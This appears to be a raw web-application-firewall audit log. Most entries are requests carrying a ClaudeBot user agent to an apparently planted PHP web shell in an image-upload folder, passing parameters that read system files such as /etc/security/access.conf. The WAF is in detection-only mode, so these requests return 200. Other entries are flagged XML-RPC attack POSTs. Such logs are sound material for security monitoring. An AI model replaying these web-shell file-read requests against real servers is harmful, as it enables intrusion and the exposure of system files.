ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --aebf9772-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4787 Connection: close Content-Type: text/html; charset=UTF-8 --aebf9772-H-- Message: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /proc/self/root/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /proc/self/root/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByCUcTB7P_sALtclDwZAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102537342639 4399 (- - -) Stopwatch2: 1750102537342639 4399; combined=2442, p1=360, p2=1960, p3=36, p4=36, p5=50, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aebf9772-Z-- --0a71ac19-A-- [17/Jun/2025:01:05:40.897560 +0530] aFByDEcTB7P_sALtclDwbwAAAAI 216.73.216.71 57652 127.0.0.1 7081 --0a71ac19-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fmountstats HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0a71ac19-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2974 Connection: close Content-Type: text/html; charset=UTF-8 --0a71ac19-H-- Message: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/root/proc/self/mountstats"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/root/proc/self/mountstats"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByDEcTB7P_sALtclDwbwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102540891386 6230 (- - -) Stopwatch2: 1750102540891386 6230; combined=3449, p1=439, p2=2863, p3=50, p4=40, p5=57, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a71ac19-Z-- --e75d0944-A-- [17/Jun/2025:01:06:04.200703 +0530] aFByI33hoSwVUy254pH7YQAAACQ 34.68.37.79 37234 127.0.0.1 7081 --e75d0944-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e75d0944-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e75d0944-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFByI33hoSwVUy254pH7YQAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102563500666 700093 (- - -) Stopwatch2: 1750102563500666 700093; combined=2235, p1=398, p2=1403, p3=39, p4=62, p5=207, sr=110, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e75d0944-Z-- --69418a26-A-- [17/Jun/2025:01:06:44.627033 +0530] aFByTB6Azi2u_ik2Q3KwfgAAAAY 216.73.216.71 59214 127.0.0.1 7081 --69418a26-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fsepermit.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --69418a26-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3186 Connection: close Content-Type: text/html; charset=UTF-8 --69418a26-H-- Message: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /proc/self/root/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /proc/self/root/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByTB6Azi2u_ik2Q3KwfgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102604622985 4105 (- - -) Stopwatch2: 1750102604622985 4105; combined=2171, p1=335, p2=1716, p3=33, p4=34, p5=53, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69418a26-Z-- --4d1e506c-A-- [17/Jun/2025:01:07:03.993818 +0530] aFByXx6Azi2u_ik2Q3KwigAAAAY 34.68.37.79 42300 127.0.0.1 7081 --4d1e506c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4d1e506c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4d1e506c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFByXx6Azi2u_ik2Q3KwigAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102623313999 679874 (- - -) Stopwatch2: 1750102623313999 679874; combined=2545, p1=395, p2=1791, p3=33, p4=65, p5=167, sr=112, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d1e506c-Z-- --496f7549-A-- [17/Jun/2025:01:07:39.106823 +0530] aFByg6C450Yw050Ymr39fAAAAAk 216.73.216.71 58010 127.0.0.1 7081 --496f7549-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Faccess.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --496f7549-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4793 Connection: close Content-Type: text/html; charset=UTF-8 --496f7549-H-- Message: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByg6C450Yw050Ymr39fAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102659102672 4208 (- - -) Stopwatch2: 1750102659102672 4208; combined=2036, p1=325, p2=1591, p3=32, p4=36, p5=52, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --496f7549-Z-- --d543a74f-A-- [17/Jun/2025:01:08:04.234703 +0530] aFBym0cTB7P_sALtclDxBwAAAAI 34.68.37.79 50668 127.0.0.1 7081 --d543a74f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --d543a74f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d543a74f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBym0cTB7P_sALtclDxBwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102683604257 630501 (- - -) Stopwatch2: 1750102683604257 630501; combined=2250, p1=387, p2=1428, p3=43, p4=72, p5=201, sr=104, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d543a74f-Z-- --fdc51307-A-- [17/Jun/2025:01:08:35.978826 +0530] aFByux6Azi2u_ik2Q3Kw0QAAAAY 216.73.216.71 43886 127.0.0.1 7081 --fdc51307-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Fsepermit.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fdc51307-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3192 Connection: close Content-Type: text/html; charset=UTF-8 --fdc51307-H-- Message: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByux6Azi2u_ik2Q3Kw0QAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102715973533 5375 (- - -) Stopwatch2: 1750102715973533 5375; combined=3070, p1=457, p2=2444, p3=46, p4=47, p5=75, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fdc51307-Z-- --f9b7cb0e-A-- [17/Jun/2025:01:08:39.712471 +0530] aFByv33hoSwVUy254pH77AAAACQ 216.73.216.71 33028 127.0.0.1 7081 --f9b7cb0e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Faccess.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f9b7cb0e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4793 Connection: close Content-Type: text/html; charset=UTF-8 --f9b7cb0e-H-- Message: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/access.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/access.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/access.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByv33hoSwVUy254pH77AAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102719706933 5612 (- - -) Stopwatch2: 1750102719706933 5612; combined=3040, p1=504, p2=2340, p3=47, p4=50, p5=99, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9b7cb0e-Z-- --392bfe0f-A-- [17/Jun/2025:01:08:43.988992 +0530] aFByw03CmevS3xeTzmoq6QAAAAQ 216.73.216.71 34074 127.0.0.1 7081 --392bfe0f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Ftime.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --392bfe0f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4067 Connection: close Content-Type: text/html; charset=UTF-8 --392bfe0f-H-- Message: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /proc/self/root/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /proc/self/root/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByw03CmevS3xeTzmoq6QAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102723984934 4112 (- - -) Stopwatch2: 1750102723984934 4112; combined=2188, p1=362, p2=1698, p3=35, p4=35, p5=58, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --392bfe0f-Z-- --deecdf52-A-- [17/Jun/2025:01:08:48.086383 +0530] aFByyEcTB7P_sALtclDxMgAAAAI 216.73.216.71 34616 127.0.0.1 7081 --deecdf52-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Fsepermit.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --deecdf52-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3192 Connection: close Content-Type: text/html; charset=UTF-8 --deecdf52-H-- Message: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/sepermit.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFByyEcTB7P_sALtclDxMgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102728082569 3869 (- - -) Stopwatch2: 1750102728082569 3869; combined=1975, p1=328, p2=1523, p3=41, p4=33, p5=50, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --deecdf52-Z-- --5eac6d20-A-- [17/Jun/2025:01:09:03.716774 +0530] aFBy18l682-knofG8qdYiQAAAAM 34.68.37.79 59734 127.0.0.1 7081 --5eac6d20-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5eac6d20-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5eac6d20-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBy18l682-knofG8qdYiQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102743048833 667998 (- - -) Stopwatch2: 1750102743048833 667998; combined=2607, p1=413, p2=1688, p3=62, p4=78, p5=225, sr=113, sw=141, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5eac6d20-Z-- --158f0c27-A-- [17/Jun/2025:01:09:32.764159 +0530] aFBy9B6Azi2u_ik2Q3KxGAAAAAY 216.73.216.71 38868 127.0.0.1 7081 --158f0c27-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Ftime.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --158f0c27-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4072 Connection: close Content-Type: text/html; charset=UTF-8 --158f0c27-H-- Message: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /snap/core20/2582/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBy9B6Azi2u_ik2Q3KxGAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102772759651 4564 (- - -) Stopwatch2: 1750102772759651 4564; combined=2344, p1=393, p2=1818, p3=38, p4=38, p5=57, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --158f0c27-Z-- --afd2dc49-A-- [17/Jun/2025:01:10:04.166751 +0530] aFBzE33hoSwVUy254pH8RAAAACQ 34.68.37.79 49664 127.0.0.1 7081 --afd2dc49-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --afd2dc49-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 